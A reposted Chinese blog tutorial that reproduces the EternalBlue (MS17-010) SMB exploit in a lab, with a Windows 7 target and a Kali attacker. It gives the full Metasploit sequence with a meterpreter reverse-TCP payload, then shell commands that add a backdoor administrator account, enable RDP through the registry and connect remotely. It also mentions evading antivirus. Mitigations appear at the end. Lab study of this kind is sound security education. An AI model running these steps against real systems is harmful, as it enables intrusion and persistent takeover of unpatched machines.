基础渗透测试实验—永恒之蓝漏洞复现

企业开发 2023-06-24 20:54:09 阅读次数: 0

文章目录

概述

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。

一、 漏洞简述

  • 漏洞名称:“永恒之蓝”漏洞

  • 漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148

  • 漏洞类型:缓冲区溢出漏洞

  • 漏洞影响:信息泄露

  • CVSS评分:9.3(High)

  • 利用难度:Medium

  • 基础权限:不需要

二、组件概述

SMB(Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。

SMB1.0协议由于在文件共享传输过程中存在的传输效率低以及传输空间小等缺陷被人们所摒弃。为了更好的实现网络中文件的共享过程,在SMB1.0的基础上开发了新的网络文件传输协议,并将其命名为SMB2.0。

该协议在实现了文件共享传输的基本功能的基础上对文件传输的效率、文件缓存的空间以及文件并发传输等问题进行改进,使得在局域网或更高配置的网络环境下,文件传输过程的速度和效率等得到了很大的提升。

三、漏洞影响

  • Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7SP1;

  • Windows 8.1; Windows Server 2012 Gold and R2; Windows RT8.1; and

  • Windows 10 Gold, 1511, and 1607; and Windows Server 2016

    以上系统打开445号端口都容易受到影响。

四、漏洞复现

4.1环境搭建

实验中需要用到俩个机器,分别是,靶机(关闭防火墙),攻击机。

靶机环境:windows_7x64
配置:192.168.231.130

攻击机环境:kali-linux-2023.1
攻击机配置:192.168.231.132

注意:靶机和攻击机能互相ping同

4.2复现过程:

1. 查看上线主机

登录Kali,切换root用户,使用nmap扫描,查看上线主机

1.sudo su   #切换root用户

2、nmap -sS -sV 192.168.231.0/24   #扫描目标ip段,查看上线主机

在这里插入图片描述

可以看到nmap扫到目标机192.168.231.130,操作系统是Windows 7,同时开放了445端口,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

2. 使用Metasploit(MSF)工具

3.msfconsole      	   #进入Meatasploit
4.saerch ms17-010      #命令搜索漏洞编号ms17-010相关模块

在这里插入图片描述exploit是攻击模块,auxiliary是辅助模块

3. 选择一个编码技术, 用来绕过杀毒软件的查杀

  1. 使用攻击模块use(模块序号)
use 0      #使用编号为0的exp
  1. Payload配置攻击载荷
set payload Windows/x64/meterpreter/severse_tcp    #配置攻击载荷并且使用反向连接
  1. Set rhosts配置目标IP地址
set rhosts 192.168.231.130     #设置目标IP
  1. Set lhost配置攻击IP地址
set lhost 192.168.231.132      #设置攻击者的IP地址就是Kali的IP地址
  1. Run 开始攻击
run    #开始攻击

在这里插入图片描述
显示WIN则代表攻击成功

4.远程控制目标机

  1. 获取目标机shell
shell     #拿到目标机shell

![在这里插入图片描述](https://img-blog.csdnimg.cn/ab3d1cfebe284f46949514e3fe053c9f.png
chcp 65001解决中文乱码问题

  1. 添加用户
net user admin 123456 /add          #net user 用户名 密码 /add

net user 						    #查看用户是否添加成功

在这里插入图片描述
能看到目标机已经成功添加用户admin

  1. 权限提升
net localgroup administrators admin /add          #权限提升到管理级别

在这里插入图片描述

  1. 开启远程桌面
netstat -ano        #查看端口开启状态,主要是看3389

在这里插入图片描述
能看没有3389端口,开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述
端口号已经开启

  1. 远程连接桌面
    新开一个终端
rdesktop 192.168.231.130     #远程连接

在这里插入图片描述

  1. 输入刚刚创建提权的用户和密码

用户:admin
密码:123456

在这里插入图片描述
控制目标机终端,ipconfig确认IP地址,到此实验结束
能做到的攻击很多,可以按照meterpreter常用命令练习练习

缓解措施

1、关闭445端口
2、更新补丁

猜你喜欢

转载自blog.csdn.net/G6_12/article/details/131084993
今日推荐
Linus “吃狗粮”最积极!
开源日报 | Winamp播放器即将开源;生成式AI之战升级第二轮;Linus“吃狗粮”最积极;AI进入泡沫前期;吴泳铭为阿里云带来了什么?
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
周排行
SVN服务端安装在阿里云
实战 | 相机标定
webpack核心概念
note20——》只要肯低头吃苦,人生就会有救
PAT甲级 1062 Talent and Virtue (25 分)排序
NG Toolset开发笔记--5GNR Resource Grid(26)
如何对待上司
oracle命令
第9章 STL迭代器
logstash使用es映射模板
每日归档
更多
2024-05-20(36)
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022